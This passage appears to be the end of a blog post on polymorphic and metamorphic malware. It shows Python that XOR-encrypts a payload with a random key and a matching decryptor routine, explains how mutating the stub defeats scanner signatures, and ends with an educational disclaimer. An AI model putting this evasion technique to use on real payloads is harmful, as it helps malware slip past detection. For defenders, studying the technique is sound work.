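    # One polymorphic generation: XOR-encrypt the payload with a fresh
    # random nonzero single-byte key. The stored bytes differ per
    # generation, but the decrypted behavior is always the same.
    key = os.urandom(1)[0] | 0x01          # force the key nonzero
    body = bytes(b ^ key for b in payload)
    return key, body

def recover(key, body):
    # The decryptor stub's job at runtime: XOR is its own inverse.
    return bytes(b ^ key for b in body)
```

In a real engine the decryptor stub itself is then run through the metamorphic pass, so neither the payload bytes nor the stub bytes give the scanner a stable anchor.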

Metamorphic code proves that software can continuously evolve its own implementation while keeping its goals unchanged.

I recommend running the code inside a debugger rather than executing it blindly. Set breakpoints and step down into the assembly layer to inspect exactly what is being generated. This is the best way to catch subtle anomalies.

That’s all for now — see you next time.

Disclaimer:

This blog post is provided solely for educational and research purposes. All technical details and code examples are intended to help defenders understand attack techniques and improve security posture. Please do not use this information to access or interfere with systems you do not own or lack explicit permission to test. Unauthorized use may violate laws and ethical standards. The author assumes no responsibility for any misuse or damage resulting from the application of the concepts discussed.

